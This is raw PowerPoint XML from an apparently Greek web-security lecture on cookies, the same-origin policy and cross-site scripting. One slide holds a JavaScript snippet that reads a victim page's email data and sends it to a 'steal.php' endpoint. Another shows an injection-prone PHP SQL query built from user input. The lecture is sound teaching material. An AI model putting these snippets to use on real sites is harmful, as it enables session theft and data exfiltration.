              <a:rPr lang="en-US" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shopping carts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>, στατιστικά, κ.α</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αν κάποιος κλέψει τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σου, γίνεται εσυ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5846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</a:t>
            </a:r>
            <a:endParaRPr lang="el-G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5" y="1772818"/>
            <a:ext cx="1478657" cy="1478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750933"/>
            <a:ext cx="1777975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555777" y="1988840"/>
            <a:ext cx="42484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19973" y="156626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Γεια!</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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55777" y="2848071"/>
            <a:ext cx="42484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98463" y="2321785"/>
            <a:ext cx="570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/>
              <a:t>Γεια, να θυμάσαι ότι είσαι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1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037" y="4941541"/>
            <a:ext cx="1478657" cy="1478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61" y="4919656"/>
            <a:ext cx="1777975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2551509" y="5157563"/>
            <a:ext cx="42484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73952" y="4734990"/>
            <a:ext cx="400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/>
              <a:t>Είμαι ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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551509" y="6016794"/>
            <a:ext cx="42484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94195" y="5490508"/>
            <a:ext cx="570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/>
              <a:t>ΟΚ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>κάνε ό,τι θες</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Cloud 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-273621" y="4039786"/>
            <a:ext cx="1708037" cy="13904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6" name="TextBox 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-98477" y="4530627"/>
            <a:ext cx="135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admin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18229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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>– Πως μοιάζουν;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GET /spec.html HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: www.example.org</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>name=value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>name2=value2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Accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*/*</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean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 smtClean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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εδώ 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με τιμή </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>name2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με τιμή </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>value2</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="1628800"/>
            <a:ext cx="5112568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580112" y="2132856"/>
            <a:ext cx="74523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44208" y="194819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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>αίτημα</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="2384884"/>
            <a:ext cx="5112568" cy="39604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580112" y="2582906"/>
            <a:ext cx="745232" cy="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65447" y="2398240"/>
            <a:ext cx="251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Κεφαλίδα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639278" y="2417074"/>
            <a:ext cx="3921228" cy="34644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692244" y="2766860"/>
            <a:ext cx="0" cy="133658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67207" y="4103442"/>
            <a:ext cx="405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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Ίδια μορφή με </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παραμέτρους</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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068404" y="2751124"/>
            <a:ext cx="0" cy="65596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-74677" y="3443313"/>
            <a:ext cx="228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/>
              <a:t>Όνομα κεφαλίδας</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490023" y="2417043"/>
            <a:ext cx="1107173" cy="3457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5598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 animBg="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="17" grpId="0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90600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σελίδες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</p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>kokkinoskoufitsa.gr</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>που ανήκει στον «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>καλό»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>που ανήκει στον «κακό»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ως διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>το επισκέπτομαι</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μου μού δίνουν πρόσβαση διαχειριστή</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Στη συνέχεια επισκέπτομαι το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χωρίς να γνωρίζω τι είναι</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αυτό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>δεν</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> θα πρέπει να επιτρέψει στον προγραμματιστή του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να αποκτήσει πρόσβαση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επιπέδου διαχειριστή στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10864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Same-origin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Υπάρχουν εμπιστευτικές πληροφορίες που έχει κανείς πρόσβαση μόνο με </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δίνοντας το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μου στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχω πρόσβαση στα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μου.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όταν ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>«ζητάει» μία σελίδα, στέλνει τα αντίστοιχα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μαζί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6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dirty="0"/>
              <a:t>Ένα αθώο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>ερώτημα...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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$res =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mysql_query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“SELECT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userid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users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password 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= ‘</a:t>
            </a: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</a:rPr>
              <a:t>$password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name = ‘</a:t>
            </a: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</a:rPr>
              <a:t>$user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</a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0"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LIMIT 1;”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r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console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614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Same-origin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 smtClean="0"/>
              <a:t>Τι γίνεται αν όταν ο διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επισκεφθεί το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>όπου θα τρέξει κάτι σαν κι αυτό;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&lt;script type=“text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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javascript</a:t>
            </a:r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”&gt;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$.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get(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“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http://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kokkinoskoufitsa.gr/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email.php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”,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function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data )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img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= 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document.createElement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‘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img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’ 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 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img.src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= ‘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steal.php?data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=’ + data;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 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document.appendChild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img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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2600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82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Same-origin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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>το απαγορεύουν αυτό</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να γίνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εικόνες από άλλες σελίδες</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να γίνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ήχοι, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>video, scripts</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αυτό το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>γίνεται με τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>ορθά </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>η ανάγνωση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> των καθεαυτών δεδομένων</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διότι αυτά μπορεί να είναι εμπιστευτικά</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>«Άλλες σελίδες» σημαίνει:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαφορετικό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain, subdomain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http VS https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαφορετική </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TCP/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>θύρα</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331284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3700"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same-origin policy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0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Same origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με το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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>store.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2016-04-11 at 8.17.1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65" b="777"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511009" y="1827600"/>
            <a:ext cx="6120569" cy="475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3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Same origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με το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latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>store.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2016-04-11 at 8.17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79" y="2009017"/>
            <a:ext cx="8028668" cy="404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3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Cross-site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Συνήθως επιτρέπει πρόσβαση σε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>= Πιστοποίηση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Άρα επιτρέπει πρόσβαση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σε λογαριασμούς που δεν θα είχαμε κανονικά</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183919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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: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r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Επιστρέφει τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>της σελίδας όπου </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>τρέχει</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήσιμο π.χ. για να βρούμε το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>του χρήστη που έχει κάνει </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>login</a:t>
            </a:r>
          </a:p>
          <a:p>
